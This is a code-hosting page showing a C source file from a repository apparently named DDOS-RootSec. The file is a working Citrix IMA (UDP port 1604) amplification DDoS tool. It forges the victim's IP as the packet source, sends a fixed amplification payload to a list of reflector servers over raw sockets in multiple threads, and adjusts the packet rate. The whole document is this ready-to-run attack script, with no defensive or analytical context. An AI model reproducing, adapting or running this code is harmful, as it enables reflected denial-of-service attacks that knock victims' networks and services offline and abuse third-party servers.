Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
R00tS3c
GitHub Repository: R00tS3c/DDOS-RootSec
 Path: blob/master/DDOS Scripts/AMP Methods/Port 1604 - Citrix/citrix.c
4622 views
1
/*-------------------------------

2
Citrix IMA Service Amplification PoC on the dumb template C script.

3
- Phenomite

4
-------------------------------*/

5
#include <arpa/inet.h>

6
#include <netinet/ip.h>

7
#include <netinet/udp.h>

8
#include <pthread.h>

9
#include <stdio.h>

10
#include <stdlib.h>

11
#include <string.h>

12
#include <sys/socket.h>

13
#include <time.h>

14
#include <unistd.h>

15


16
static unsigned int DPORT = 1604;

17
static const char PAYLOAD[] =

18
    "\x2a\x00\x01\x32\x02\xfd\xa8\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"

19
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x21\x00\x02\x00\x00\x00\x00\x00"

20
    "\x00\x00\x00\x00\x00\x00";

21


22
// Phenomite template begin

23
#define MAX_PACKET_SIZE 4096

24
#define PHI 0xaaf219b9

25
static uint32_t Q[4096], c = 362436;

26
static unsigned int PAYLOADSIZE = sizeof(PAYLOAD) - 1;

27


28
struct list {

29
  struct sockaddr_in data;

30
  struct list *next;

31
  struct list *prev;

32
};

33
struct list *head;

34
volatile int tehport;

35
volatile int limiter;

36
volatile unsigned int pps;

37
volatile unsigned int sleeptime = 100;

38
struct thread_data {

39
  int thread_id;

40
  struct list *list_node;

41
  struct sockaddr_in sin;

42
};

43


44
void init_rand(uint32_t x) {

45
  int i;

46
  Q[0] = x;

47
  Q[1] = x + PHI;

48
  Q[2] = x + PHI + PHI;

49
  for (i = 3; i < 4096; i++) {

50
    Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i;

51
  }

52
}

53


54
uint32_t rand_cmwc(void) {

55
  uint64_t t, a = 18782LL;

56
  static uint32_t i = 4095;

57
  uint32_t x, r = 0xfffffffe;

58
  i = (i + 1) & 4095;

59
  t = a * Q[i] + c;

60
  c = (t >> 32);

61
  x = t + c;

62
  if (x < c) {

63
    x++;

64
    c++;

65
  }

66
  return (Q[i] = r - x);

67
}

68


69
/* function for header checksums */

70
unsigned short csum(unsigned short *buf, int nwords) {

71
  unsigned long sum;

72
  for (sum = 0; nwords > 0; nwords--)

73
    sum += *buf++;

74
  sum = (sum >> 16) + (sum & 0xffff);

75
  sum += (sum >> 16);

76
  return (unsigned short)(~sum);

77
}

78


79
void setup_ip_header(struct iphdr *iph) {

80
  iph->ihl = 5;

81
  iph->version = 4;

82
  iph->tos = 0;

83
  iph->tot_len = sizeof(struct iphdr) + sizeof(struct udphdr) + PAYLOADSIZE;

84
  iph->id = htonl(61337);

85
  iph->frag_off = 0;

86
  iph->ttl = MAXTTL;

87
  iph->protocol = IPPROTO_UDP;

88
  iph->check = 0;

89
  iph->saddr = inet_addr("127.0.0.1");

90
}

91
void setup_udp_header(struct udphdr *udph) {

92
  udph->source = htons(61337);

93
  udph->dest = htons(DPORT);

94
  udph->check = 0;

95
  memcpy((void *)udph + sizeof(struct udphdr), PAYLOAD, PAYLOADSIZE);

96
  udph->len = htons(sizeof(struct udphdr) + PAYLOADSIZE);

97
}

98
void *flood(void *par1) {

99
  struct thread_data *td = (struct thread_data *)par1;

100
  char datagram[MAX_PACKET_SIZE];

101
  struct iphdr *iph = (struct iphdr *)datagram;

102
  struct udphdr *udph = (/*u_int8_t*/ void *)iph + sizeof(struct iphdr);

103
  struct sockaddr_in sin = td->sin;

104
  struct list *list_node = td->list_node;

105
  int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);

106
  if (s < 0) {

107
    fprintf(stderr, "Could not open raw socket.\n");

108
    exit(-1);

109
  }

110
  init_rand(time(NULL));

111
  memset(datagram, 0, MAX_PACKET_SIZE);

112
  setup_ip_header(iph);

113
  setup_udp_header(udph);

114
  udph->source = htons(tehport);

115
  iph->saddr = sin.sin_addr.s_addr;

116
  iph->daddr = list_node->data.sin_addr.s_addr;

117
  iph->check = csum((unsigned short *)datagram, iph->tot_len >> 1);

118
  int tmp = 1;

119
  const int *val = &tmp;

120
  if (setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof(tmp)) < 0) {

121
    fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");

122
    exit(-1);

123
  }

124
  init_rand(time(NULL));

125
  register unsigned int i;

126
  i = 0;

127
  while (1) {

128
    list_node = list_node->next;

129
    iph->daddr = list_node->data.sin_addr.s_addr;

130
    iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);

131
    iph->check = csum((unsigned short *)datagram, iph->tot_len >> 1);

132
    sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *)&list_node->data,

133
           sizeof(list_node->data));

134
    pps++;

135
    if (i >= limiter) {

136
      i = 0;

137
      usleep(sleeptime);

138
    }

139
    i++;

140
  }

141
}

142
int main(int argc, char *argv[]) {

143
  if (argc < 6) {

144
    fprintf(stdout, "%s host port listfile threads limit[-1 for none] time\n",

145
            argv[0]);

146
    exit(-1);

147
  }

148
  srand(time(NULL));

149
  int i = 0;

150
  head = NULL;

151
  fprintf(stdout, "Loading list to buffer\n");

152
  int max_len = 512;

153
  char *buffer = (char *)malloc(max_len);

154
  buffer = memset(buffer, 0x00, max_len);

155
  tehport = atoi(argv[2]);

156
  int num_threads = atoi(argv[4]);

157
  int maxpps = atoi(argv[5]);

158
  limiter = 0;

159
  pps = 0;

160
  int multiplier = 20;

161
  FILE *list_fd = fopen(argv[3], "r");

162
  while (fgets(buffer, max_len, list_fd) != NULL) {

163
    if ((buffer[strlen(buffer) - 1] == '\n') ||

164
        (buffer[strlen(buffer) - 1] == '\r')) {

165
      buffer[strlen(buffer) - 1] = 0x00;

166
      if (head == NULL) {

167
        head = (struct list *)malloc(sizeof(struct list));

168
        bzero(&head->data, sizeof(head->data));

169
        head->data.sin_addr.s_addr = inet_addr(buffer);

170
        head->next = head;

171
        head->prev = head;

172
      } else {

173
        struct list *new_node = (struct list *)malloc(sizeof(struct list));

174
        memset(new_node, 0x00, sizeof(struct list));

175
        new_node->data.sin_addr.s_addr = inet_addr(buffer);

176
        new_node->prev = head;

177
        new_node->next = head->next;

178
        head->next = new_node;

179
      }

180
      i++;

181
    } else {

182
      continue;

183
    }

184
  }

185
  struct list *current = head->next;

186
  pthread_t thread[num_threads];

187
  struct sockaddr_in sin;

188
  sin.sin_family = AF_INET;

189
  sin.sin_addr.s_addr = inet_addr(argv[1]);

190
  struct thread_data td[num_threads];

191
  for (i = 0; i < num_threads; i++) {

192
    td[i].thread_id = i;

193
    td[i].sin = sin;

194
    td[i].list_node = current;

195
    pthread_create(&thread[i], NULL, &flood, (void *)&td[i]);

196
  }

197
  fprintf(stdout, "Yeeting\n");

198
  for (i = 0; i < (atoi(argv[6]) * multiplier); i++) {

199
    usleep((1000 / multiplier) * 1000);

200
    if ((pps * multiplier) > maxpps) {

201
      if (1 > limiter) {

202
        sleeptime += 100;

203
      } else {

204
        limiter--;

205
      }

206
    } else {

207
      limiter++;

208
      if (sleeptime > 25) {

209
        sleeptime -= 25;

210
      } else {

211
        sleeptime = 0;

212
      }

213
    }

214
    pps = 0;

215
  }

216
  return 0;

217
}

218


219